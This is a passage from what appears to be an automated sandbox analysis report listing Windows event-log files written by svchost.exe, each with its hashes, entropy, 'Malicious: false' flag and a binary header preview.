SSDEEP:	384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
MD5:	86AEA3A9CA3E5909FD44812754E52BD6
SHA1:	F79B583F83F118AC724A5A4206FC439B88BB8C65
SHA-256:	2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
SHA-512:	17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
Malicious:	false
Preview:	ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4467272005363894
Encrypted:	false
SSDEEP:	384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
MD5:	155681C222D825199B738E8DEC707DC8
SHA1:	704C800E7313F77A218203554E1428DF2819BC34
SHA-256:	1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
SHA-512:	ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
Malicious:	false
Preview:	ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.156155224835584
Encrypted:	false
SSDEEP:	384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
MD5:	F22AC858C2ACC96E8F189E43FFE46FBD
SHA1:	540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
SHA-256:	771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
SHA-512:	B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
Malicious:	false
Preview:	ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9197999988543422
Encrypted:	false
SSDEEP:	384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
MD5:	6C3F290FC62CFA9C240AEE8DB1DBA277
SHA1:	CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
SHA-256:	7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
SHA-512:	D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9963080376858662
Encrypted:	false
SSDEEP:	384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
MD5:	A51AFE78FA4481FA05EDC1133C92B1D8
SHA1:	5BA44E7A99EE615E323696742DA6B930E9FF6198
SHA-256:	44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
SHA-512:	792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
Malicious:	false
Preview:	ElfChnk......................................)..0-....\.....................................................................\|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.076996627399968
Encrypted:	false
SSDEEP:	384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
MD5:	A8ADBDC2B39B55444B2C844F7D81EBDE
SHA1:	F97F40E314C8A2A39953A28CB72C9270D3073418
SHA-256:	93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
SHA-512:	922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
Malicious:	false
Preview:	ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.225730557862833
Encrypted:	false
SSDEEP:	384:lhhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGN:lhZxGp9QUR
MD5:	BD6CAD12604196E9694EB0DED4664DD7
SHA1:	4F287C027141F3EEFDF14F391F4BC6311CDF76D6
SHA-256:	6EB7AEB7D74BDBF9353DE665252C8F1A6CF20E350FCF52FA9B10EC8D5155A124
SHA-512:	70698FFEB836522F9B08E46A43D181218E057BFF7A49F04CB6E56C5105862A3315AF8D5F8A0F24A655E885961B85863C5FB6B4601CEF87A77D6E92C4AB4A78F1
Malicious:	false
Preview:	ElfChnk.T...............T...................P...h..............................................................................)........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.801423310886069
Encrypted:	false
SSDEEP:	384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
MD5:	9EAAD7982F42DFF47B8EF784DD2EE1CC
SHA1:	542608204AF6B709B06807E9466F7543C0F08818
SHA-256:	5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
SHA-512:	036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
Malicious:	false
Preview:	ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.996272372482282
Encrypted:	false
SSDEEP:	768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
MD5:	4F68D6AF0C7DB9E98F8B592C9A07811C
SHA1:	9F519109344DD57150F16B540AAA417483EF44FE
SHA-256:	44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
SHA-512:	E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
Malicious:	false
Preview:	ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	dBase III DBT, next free block index 1130785861, 1st item "**"
Category:	dropped
Size (bytes):	68624
Entropy (8bit):	3.8803912084530934
Encrypted:	false
SSDEEP:	768:HhZjV8k+u7eUtHpoVWW930GMAow407SZRcZv76NcRkpHrWbGyYKQc90X3KztputD:XjV8k+u7PtHpoVWgztputD
MD5:	297D63DF14FF4EAE4FC3E6E97DFFE1B8
SHA1:	A732915BD998B5975E614773FD11C2B12CB2A3F2
SHA-256:	157A2BB88A9F14E8D96FEC33C72D4DB1AEAB9AB3FCC05FA33A2EA985E1CF4B53
SHA-512:	C6BD2FCC12D8BB8EC9217F00E62BB17E809D982E7D71353FC5CB1AAC28F8872E62313B8EBB231F74644C0AB2A44C4B99A50CBA0B96A079E46CC409F5EC0599D6
Malicious:	false
Preview:	ElfChnk.................O.......Q.....................CO....................................................................[.d9................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..`...O.......5....3............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.739113605399636
Encrypted:	false
SSDEEP:	384:Rh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKn0:RkN2cTOsKXHYnjo3i5MiCNrjzDbRt
MD5:	0FBEC709DF1944390CB495D051200658
SHA1:	C9A34308B048C2ED2E914B649BDB9788F9DCB3FD
SHA-256:	BDCC86B57507E06D23348C083E047A23A262C886AB8605D8F7412FEF0F3B3E8C
SHA-512:	48F5EA754067B67D61D20650F826865E48139DBF37426714475B0816CA8147E4B77ABD42DFA2A93CA27D50589E9994DC98C39D5E9AD6FB5E92E5B5FA16743DFB
Malicious:	false
Preview:	ElfChnk......................................... ..........................................................................A..%................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7590316238843728
Encrypted:	false
SSDEEP:	384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
MD5:	B074238315662886E2BD70106D08A747
SHA1:	5ADA158D19401565E76349FCA97489E9FB9BFA36
SHA-256:	53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
SHA-512:	9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
Malicious:	false
Preview:	ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.751375021824549
Encrypted:	false
SSDEEP:	1536:mXhmUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:mX8nS
MD5:	785E11A44EE4AA8C286910A68EAA6810
SHA1:	702FAD7424146146E8923D00A67817C285D3A1D4
SHA-256:	6723DD3C01D72C9B65258E7AB0C764F2CD0C04EDB3ABA4AFB9E290ADE26598E6
SHA-512:	932EE4B787D061F7D0BEFF891F46DFDFCE58DAB97EA556BCFB6666D45FD0AC367DD5657E5E350A3B2C871096AE3020DCB0546F952FC8AD1248047E9694924994
Malicious:	false
Preview:	ElfChnk.........%...............%............E..`G....j......................................................................8.u................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3069197485541766
Encrypted:	false
SSDEEP:	768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
MD5:	E6E4C860CE7DD1BB499D6A082B461B90
SHA1:	11330861B23B1D29D777D9BD10619A07B6A6A9C0
SHA-256:	C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
SHA-512:	7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
Malicious:	false
Preview:	ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&........................................................................l..............]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	2680
Entropy (8bit):	3.847051142887774
Encrypted:	false
SSDEEP:	48:MlSpWfCKOrCK3QbB69DpyzxCKOrCK3QbkcqrxCKOrCK3QbkcqrB:uCKOrCKgl69DkNCKOrCKgbkcGxCKOrCi
MD5:	D4AC2313A18C7E4A6311709377D68FD8
SHA1:	9E15635BB8131E00AFE8FA51D365C9D911F0860C
SHA-256:	52C02314E0603331A5EDCBE4A9958BC09ACEC5B4FE4CCCE47C659E57335BA7B4
SHA-512:	9F03ADC0BEF57DCF213B63702498F32E0F9EEB20F917B2D3673FADD35B64F77BC149267BDDFDE4049555F92371C24C889AB19745BC61D67790C1D7E35E77A1C2
Malicious:	false
Preview:	ElfChnk.........&...............&...........0...0...-.;9....................................................................NV_.................T.......................\|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**......$............3............................................................................L.......b.....!......................3..@..^<.....fX............$....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^'...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2909571978750325
Encrypted:	false
SSDEEP:	384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
MD5:	B0BF4D9EC91ABBDA5D328631B125A5C0
SHA1:	E672D69127AE7C1A51046ADAA911871EC0C10ABB
SHA-256:	8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
SHA-512:	3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
Malicious:	false
Preview:	ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.488768580471203
Encrypted:	false
SSDEEP:	1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
MD5:	E3FB1708C64D250E4D801AFB8688DF35
SHA1:	8B889F0358683733257411E451A86E3A1D42159D
SHA-256:	0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
SHA-512:	2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
Malicious:	false
Preview:	ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.496531400605697
Encrypted:	false
SSDEEP:	1536:AcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20Gp:AcRFkL1TWX0gkB/J7oasEfyk2/vKlqkh
MD5:	9011A0E4DEFA3C3FBFB5859DA7EBB8BC
SHA1:	263BDF6E0EE11B4DF4D5F3F5533873033A1E6EE6
SHA-256:	27C1F680117E317D827E42FA9F3F6A9BB8E8DDABD7378421E2564D44710335A7
SHA-512:	5F8109C60764CFC21629279396D67C92D9740C19845029D81EB6C877396CB814E8179E54014B5E7F686E5195B5508E85AF9BA140C37A08C896E5C02E4850635C
Malicious:	false
Preview:	ElfChnk.>...............>...........................Do'.....................................................................W...................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 0.012519
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.494464248912537
Encrypted:	false
SSDEEP:	384:DhN7s7o787l7r787a7J7z7+7N17g7M7l7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:D9vuCg
MD5:	6E9BB7022D31B284C06192DF34EED5B9
SHA1:	FB38F043E561F91A060A6DA1256E36A263CCA6FC
SHA-256:	C92BD255D4E35616D4426E4BF96902991FD53CBA04E4A874483447F551BFF71F
SHA-512:	704B6802C38D73EC84205D45893D21D8AEEA999320DADF766D3470C6D998B54FEAE3E8A5C98D2B7A3211740CEEED904E59E7A913E33B1BCF792FFC1949E20B36
Malicious:	false
Preview:	ElfChnk.Y.......g.......Y.......g............%...&...t.......................................................................e.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.1499045494600955
Encrypted:	false
